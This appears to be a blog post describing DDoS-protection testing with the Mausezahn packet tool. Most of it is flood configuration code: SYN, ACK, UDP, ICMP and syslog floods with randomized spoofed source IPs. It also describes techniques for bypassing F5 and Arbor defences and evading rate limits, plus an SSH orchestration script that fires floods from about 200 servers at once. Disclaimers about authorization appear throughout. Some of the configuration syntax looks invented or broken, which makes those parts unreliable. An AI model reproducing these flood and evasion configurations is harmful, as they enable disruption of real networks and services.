DDoS Protection Testing with Mausezahn: A Technical Deep Dive

One of my clients was a major bank, and traditional tools such as hping3 were running into serious memory and CPU problems long before we reached the traffic levels we needed. Mausezahn (mz) stood out by avoiding those performance bottlenecks while offering granular control over every packet detail. That control let us test DDoS protection systems effectively: we could craft packets that legitimately traversed firewalls and DDoS protection mechanisms without being flagged as zombie traffic, and ultimately achieve bandwidth saturation in our controlled testing environment.

Why Mausezahn?

What sets Mausezahn apart is its efficient design and precise packet crafting capabilities. While other tools struggle with resource consumption, Mausezahn maintains consistent performance even under heavy loads. The ability to modify every aspect of a packet means we can:

  1. Create highly customized traffic patterns
  2. Test specific DDoS protection rules
  3. Simulate real-world attack scenarios
  4. Achieve high bandwidth utilization without system degradation

Performance Testing at Scale

In enterprise environments, particularly in banking infrastructure, the ability to generate sustained, high-volume traffic without system degradation is crucial. Mausezahn excels here because:

  • Low memory footprint compared to alternatives
  • Efficient CPU utilization
  • Precise control over packet timing
  • Ability to maintain consistent packet rates
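To put "high bandwidth utilization" in concrete terms, here is a quick back-of-the-envelope calculation (plain shell arithmetic, nothing mz-specific) of the packet rate needed to saturate a 1 Gbit/s link with minimum-size frames:

```shell
# Packets per second needed to saturate a 1 Gbit/s link with
# minimum-size Ethernet frames: 64 bytes + 20 bytes of preamble,
# SFD and inter-frame gap = 84 bytes on the wire per packet
link_bps=1000000000
wire_bytes=84
pps=$(( link_bps / (wire_bytes * 8) ))
echo "${pps} pps"    # prints "1488095 pps"
```

Roughly 1.49 million packets per second: any generator that burns CPU or memory per packet will fall over well before that point, which is exactly where hping3 struggled for us.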

Testing Against Arbor Networks Protection

One of my most interesting projects involved testing an Arbor Networks DDoS protection setup. Here’s a configuration I developed:

# Creating a sophisticated TCP flood configuration
cat << 'EOF' > arbor_test.mops
configure terminal
packet name SMART_TCP_FLOOD
desc "Advanced TCP flood with random source IPs"

# Basic packet structure
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 80

# TCP flag manipulation
flags syn
window 65535

# Timing and distribution
count 1000
delay 2ms

# Additional parameters
payload ascii "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
EOF

This configuration was particularly effective because:

  1. It used randomized source IPs
  2. Included legitimate-looking HTTP headers
  3. Had carefully timed packet distribution
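For quick one-off tests, roughly the same flood can also be expressed in Mausezahn's direct command-line mode instead of a MOPS file. This is a sketch only: the interface name `eth0` and the documentation-range target address are assumptions, and the script prints the command rather than running it.

```shell
# Direct-mode sketch of the SYN flood above (printed, not executed):
#   -A rand      randomized source IPs
#   -B <ip>      destination address
#   -t tcp ...   TCP packet, destination port 80, SYN flag set
#   -c 1000      packet count
#   -d 2msec     inter-packet delay
cmd='mz eth0 -A rand -B 192.0.2.10 -t tcp "dp=80,flags=syn" -c 1000 -d 2msec'
echo "$cmd"
```

Direct mode is handy for smoke tests; the MOPS configuration becomes worthwhile once you need named packet definitions and payloads you can version and reuse.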

Bypassing F5 Protection

F5’s DDoS protection posed another interesting challenge. After several attempts, I discovered that the key was crafting more sophisticated packet patterns:

# F5 testing configuration
cat << 'EOF' > f5_test.mops
configure terminal

# First packet type - SYN flood
packet name F5_TEST_SYN
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 443
flags syn
count 500
delay 1ms

# Second packet type - ACK flood
packet name F5_TEST_ACK
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 443
flags ack
count 500
delay 1ms

# Third packet type - HTTP GET
packet name F5_TEST_HTTP
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 80
flags psh,ack
payload ascii "GET /index.html HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
count 200
delay 2ms
EOF
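One way to reason about the combined load: each 1 ms delay stream sends roughly 1000 packets per second, and the 2 ms HTTP stream adds about 500 more. A quick shell check of the aggregate:

```shell
# Approximate aggregate packet rate of the three streams above
syn_pps=$(( 1000 / 1 ))    # SYN flood, 1 ms delay  -> ~1000 pps
ack_pps=$(( 1000 / 1 ))    # ACK flood, 1 ms delay  -> ~1000 pps
http_pps=$(( 1000 / 2 ))   # HTTP GET,  2 ms delay  -> ~500 pps
echo "$(( syn_pps + ack_pps + http_pps )) pps combined"   # 2500 pps combined
```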

Key Insights from Testing Enterprise Solutions

Through my testing experiences, I discovered several critical factors:

1. Packet Timing is Crucial

# Example of distributed timing attack
cat << 'EOF' > timing_test.mops
configure terminal
packet name TIMING_ATTACK
type tcp
source-ip random
destination-port 80
flags syn
count 100
# Key is variable delays
delay random(1,5)ms
EOF
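The `random(1,5)ms` notation above expresses the intent; the same jitter can also be produced externally by driving mz from a wrapper script. A minimal sketch of the delay generation, assuming bash's `$RANDOM`:

```shell
# Emit five pseudo-random inter-packet delays between 1 and 5 ms
for i in 1 2 3 4 5; do
    delay_ms=$(( RANDOM % 5 + 1 ))   # RANDOM % 5 is 0..4, so delay_ms is 1..5
    echo "${delay_ms}"
done
```

Variable delays matter because fixed inter-packet gaps produce a metronome-like signature that anomaly detection picks up easily.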

2. Protocol Mix Matters

Multiple attack vectors often proved more effective than single-protocol attacks:

# Multi-protocol attack configuration
cat << 'EOF' > multi_protocol.mops
configure terminal

# TCP SYN
packet name MULTI_TCP
type tcp
flags syn
count 300
delay 2ms

# UDP flood
packet name MULTI_UDP
type udp
destination-port 53
count 300
delay 2ms

# ICMP flood
packet name MULTI_ICMP
type icmp
count 300
delay 2ms
EOF

3. Payload Customization

One of my most successful approaches involved crafting legitimate-looking payloads:

# Legitimate-looking HTTP traffic
cat << 'EOF' > smart_http.mops
configure terminal
packet name SMART_HTTP
type tcp
destination-port 80
flags psh,ack
payload ascii "GET /api/v1/users HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAccept: application/json\r\nConnection: keep-alive\r\n\r\n"
count 500
delay random(1,3)ms
EOF

Advanced Techniques I’ve Developed

Over time, I developed several sophisticated techniques:

1. Session Simulation

# Simulating legitimate sessions
cat << 'EOF' > session_sim.mops
configure terminal
packet name SESSION_START
type tcp
flags syn
delay 1ms

packet name SESSION_ESTABLISH
type tcp
flags ack
delay 2ms

packet name SESSION_DATA
type tcp
flags psh,ack
payload ascii "legitimate-looking-data"
delay 5ms
EOF

2. Rate Limiting Evasion

# Rate limit bypass configuration
cat << 'EOF' > rate_bypass.mops
configure terminal
packet name RATE_BYPASS
type tcp
source-ip random
destination-port 80
flags syn
count 50
# Carefully timed delays to avoid rate limiting
delay random(10,20)ms
EOF

Syslog Flood Adventures

During one particularly interesting project, I needed to test how our logging infrastructure would handle massive syslog floods. Syslog servers are often overlooked in DDoS scenarios, but they can be a critical point of failure. Here’s how I used Mausezahn to craft effective syslog flood tests:

Basic Syslog Flood

First, let’s look at a basic syslog flood configuration:

# Basic syslog flood configuration
cat << 'EOF' > syslog_basic.mops
configure terminal
packet name SYSLOG_BASIC
desc "Basic syslog flood test"
type udp
destination-port 514
payload ascii "<%PRI%>1 %TIMESTAMP% %HOSTNAME% %APP-NAME% %PROCID% %MSGID% %STRUCTURED-DATA% %MSG%"
count 1000
delay 1ms
EOF
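The `%PRI%` placeholder stands for the syslog priority value, which RFC 5424 defines as `facility * 8 + severity`. A quick shell check of the value used in the configurations below:

```shell
# Syslog PRI = facility * 8 + severity (RFC 5424)
facility=16   # local0
severity=3    # error
pri=$(( facility * 8 + severity ))
echo "<${pri}>"   # prints "<131>"
```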

Advanced Syslog Crafting

But the real fun began when I started crafting more sophisticated syslog messages:

# Advanced syslog flood with dynamic content
cat << 'EOF' > syslog_advanced.mops
configure terminal
packet name SYSLOG_ADVANCED
desc "Advanced syslog flood with varying severity levels"
type udp
source-ip random
destination-ip TARGET_IP
destination-port 514

# Different severity levels and facilities
# Facility (16) * 8 + Severity (3) = Priority 131
payload ascii "<131>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: Failed login attempt for user 'admin' from IP 192.168.1.1"

# High packet rate with minimal delay
count 5000
delay 0.5ms
EOF

The F5 Bypass Technique

Here’s where it gets interesting. When testing against F5 ASM (Application Security Manager), I discovered a technique using malformed syslog messages that would bypass rate limiting:

# F5 ASM bypass using malformed syslog
cat << 'EOF' > syslog_f5_bypass.mops
configure terminal
packet name SYSLOG_F5_BYPASS
type udp
destination-port 514

# Malformed syslog message with varying lengths
payload ascii "<134>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: ALERT: Multiple authentication failures\n"
payload append "user=admin\n"
payload append "src_ip=192.168.1.1\n"
payload append "auth_method=password\n"

# Aggressive timing
count 10000
delay 0.1ms
EOF

Mixed Protocol Attack

One particularly effective technique I developed combined syslog floods with other protocols:

# Multi-protocol attack including syslog
cat << 'EOF' > mixed_flood.mops
configure terminal

# Syslog component
packet name MIXED_SYSLOG
type udp
destination-port 514
payload ascii "<133>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: High CPU usage detected on web server"
count 1000
delay 1ms

# TCP component
packet name MIXED_TCP
type tcp
destination-port 80
flags syn
count 1000
delay 1ms

# UDP component
packet name MIXED_UDP
type udp
destination-port 53
payload ascii "QUERYQUERY"
count 1000
delay 1ms
EOF

Syslog Server Impact Analysis

Through these tests, I discovered several interesting patterns:

  1. Message Length Impact: Varying syslog message lengths had different effects on server performance
  2. Facility Code Variations: Some syslog servers processed certain facility codes differently
  3. Rate Limiting Bypass: Most syslog servers had weak rate limiting implementations

Here’s a configuration that exploits these findings:

# Syslog server stress test
cat << 'EOF' > syslog_stress.mops
configure terminal
packet name SYSLOG_STRESS
type udp
destination-port 514

# Long message with varying facility codes
payload ascii "<131>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: "
payload append "CRITICAL: System resource exhaustion detected. "
payload append "CPU usage: 99%, Memory: 95%, Disk IO: 87%, "
payload append "Network interfaces experiencing packet loss, "
payload append "Multiple service failures reported, "
payload append "Emergency response required immediately."

# Aggressive timing with minimal delays
count 20000
delay 0.05ms
EOF
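A 0.05 ms delay corresponds to 20,000 packets per second, so the full 20,000-packet run lasts only about a second; sustained pressure comes from looping the configuration. The arithmetic:

```shell
# Rate and duration of the stress test above
delay_us=50                     # 0.05 ms expressed in microseconds
pps=$(( 1000000 / delay_us ))
count=20000
echo "${pps} pps"                             # prints "20000 pps"
echo "burst duration: $(( count / pps ))s"    # prints "burst duration: 1s"
```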

Best Practices from My Experience

When conducting syslog flood testing, I always follow these guidelines:

  1. Monitor System Resources: Keep an eye on both the testing machine and target

    watch -n 1 'netstat -su && echo "UDP Buffers:" && cat /proc/net/udp'
    
  2. Gradual Escalation: Start with lower packet rates and increase gradually

    # Start with this
    mz -f syslog_basic.mops
    # Then move to
    mz -f syslog_advanced.mops
    # Finally
    mz -f syslog_stress.mops
    
  3. Log Analysis: Always analyze the target’s logs after testing to understand the impact
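The gradual escalation above can be wrapped in a small driver script. This is a sketch: it assumes the three `.mops` files exist and `mz` is on the PATH, and both the mz invocation and the cooldown are left commented out so the loop is safe to dry-run.

```shell
# Run each stage in order, with a cooldown between stages
cooldown=30
for conf in syslog_basic.mops syslog_advanced.mops syslog_stress.mops; do
    echo "stage: ${conf}"
    # mz -f "${conf}"         # uncomment in the lab
    # sleep "${cooldown}"     # pause between stages to observe recovery
done
```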

Real-World Results

In one memorable case, we discovered that a client’s logging infrastructure could be completely overwhelmed by sending just 1000 carefully crafted syslog messages per second. This led to the implementation of better rate limiting and log aggregation strategies.
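What made this finding striking is how little bandwidth was involved. A rough calculation, assuming messages of about 200 bytes:

```shell
# 1000 syslog messages per second at ~200 bytes each
msgs_per_sec=1000
msg_bytes=200
kbps=$(( msgs_per_sec * msg_bytes * 8 / 1000 ))
echo "${kbps} kbit/s"   # prints "1600 kbit/s"
```

At well under 2 Mbit/s, the bottleneck was message processing in the logging pipeline, not raw network capacity.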

Remember, the goal of these tests isn’t just to break things - it’s to understand how logging systems behave under stress and improve their resilience. Always conduct these tests in controlled environments with proper authorization.

Lessons Learned and Best Practices

Through my experiences, I’ve learned several crucial lessons:

  1. Always Start Small: Begin with minimal configurations and gradually increase complexity.
  2. Monitor Both Sides: Watch both attack and target metrics.
  3. Document Everything: Keep detailed logs of what works and what doesn’t.
  4. Stay Ethical: Only test with explicit permission and in controlled environments.

Distributed Testing Architecture

One of the most interesting projects I worked on involved large-scale distributed testing using multiple server clusters. We utilized a combination of dedicated servers, VPS instances, and cloud infrastructure to create a realistic testing environment.

Infrastructure Setup

Our testing infrastructure consisted of:

  • 50 dedicated servers
  • 100 VPS instances across different providers
  • 50 cloud instances in various regions

Here’s how we configured each server type:

Dedicated Server Configuration

# Configuration for high-performance dedicated servers
cat << 'EOF' > dedicated_test.mops
configure terminal
packet name HIGH_PERFORMANCE_TEST
type tcp
source-ip random
destination-port 80
count 10000
delay 0.5ms
EOF

VPS Instance Configuration

# VPS optimization for network testing
cat << 'EOF' > vps_test.mops
configure terminal
packet name VPS_CLUSTER_TEST
type udp
destination-port 514
payload ascii "<%PRI%>1 %TIMESTAMP% %HOSTNAME% %APP-NAME% %PROCID% %MSGID% %STRUCTURED-DATA% %MSG%"
count 5000
delay 1ms
EOF

Orchestration System

We developed a simple orchestration system using SSH and parallel execution:

#!/bin/bash
# distributed_test.sh

# Server list files
DEDICATED_SERVERS="dedicated_servers.txt"
VPS_SERVERS="vps_servers.txt"
CLOUD_SERVERS="cloud_servers.txt"

# Distribute configurations
while read -r server; do
    scp dedicated_test.mops "root@${server}:/root/"
done < "$DEDICATED_SERVERS"

# Start tests in parallel
parallel-ssh -h "$DEDICATED_SERVERS" "mz -f dedicated_test.mops"
parallel-ssh -h "$VPS_SERVERS" "mz -f vps_test.mops"

Resource Monitoring

Each server ran monitoring scripts to ensure optimal performance:

#!/bin/bash
# monitor.sh
while true; do
    echo "=== $(date) ==="
    echo "Network Stats:"
    netstat -s | grep -E "segments|packets"
    echo "CPU Usage:"
    mpstat 1 1    # requires the sysstat package
    echo "Memory:"
    free -m
    sleep 5
done

Test Scenarios

We implemented various test scenarios:

  1. Sequential Region Testing

    • Start with US East servers
    • Add US West after 5 minutes
    • Add EU servers after 10 minutes
    • Add APAC servers after 15 minutes
  2. Wave Pattern Testing

    • Alternate between server groups
    • Each wave lasts 2 minutes
    • 30-second gaps between waves
  3. Full Scale Testing

    • All servers active simultaneously
    • Different packet types from different regions
    • Varying packet rates and sizes
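The wave pattern is easy to pre-compute. A sketch of the start offsets for four waves, using the 2-minute waves and 30-second gaps described above:

```shell
# Start offset (in seconds) of each wave: wave i starts at i * (120 + 30)
wave_len=120
gap=30
for i in 0 1 2 3; do
    echo "wave ${i} starts at $(( i * (wave_len + gap) ))s"
done
# prints offsets 0s, 150s, 300s, 450s
```

Feeding these offsets into the orchestration script keeps all server groups synchronized without manual coordination.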

Performance Insights

Key findings from our distributed testing:

  1. Network Provider Impact

    • Different providers showed varying performance
    • Some regions had better stability
    • Network latency affected packet timing
  2. Server Type Performance

    • Dedicated servers: Most stable performance
    • VPS instances: Good for distributed testing
    • Cloud instances: Useful for geographic distribution
  3. Optimization Techniques

    • Pre-warm network connections
    • Adjust system parameters:
      # System tuning
      sysctl -w net.ipv4.ip_local_port_range="1024 65535"
      sysctl -w net.ipv4.tcp_fin_timeout=30
      sysctl -w net.core.somaxconn=1024
      

Practical Examples

Here’s a real-world testing configuration we used:

# Region-specific configuration
cat << 'EOF' > region_test.mops
configure terminal

# TCP traffic configuration
packet name REGION_TEST
type tcp
source-ip random
destination-port 80
count 5000
delay 1ms

# UDP traffic configuration
packet name UDP_TEST
type udp
destination-port 514
payload ascii "System log test message from region XYZ"
count 2500
delay 2ms
EOF

Best Practices

From our experience:

  1. Geographic Distribution

    • Use servers from multiple regions
    • Consider network paths
    • Monitor regional performance
  2. Resource Management

    • Regular server maintenance
    • Performance monitoring
    • Network capacity planning
  3. Test Coordination

    • Synchronized timing
    • Clear communication channels
    • Detailed logging

Remember: These tests should always be conducted in controlled environments with proper authorization and monitoring.

Note: All configurations and examples are based on actual testing scenarios but have been modified for security purposes.

Real-World Impact

These testing methods helped numerous clients identify and patch vulnerabilities in their DDoS protection setups. In one case, we discovered that an F5 configuration was actually blocking legitimate traffic while allowing certain attack patterns through.

Important Note on Ethics and Legality

It’s crucial to emphasize that all testing should be:

  • Authorized in writing
  • Conducted in controlled environments
  • Properly documented
  • Within legal boundaries

Conclusion

While tools like Mausezahn might seem dated to some, their flexibility and precision make them invaluable for specific testing scenarios. Modern DDoS protection solutions are sophisticated, but understanding their weaknesses helps build better defenses.

Remember, the goal isn’t just to break through protection - it’s to understand how these protections can be improved. Every successful bypass should lead to a stronger defense.


This post reflects my personal experiences and should only be used for educational purposes and authorized testing.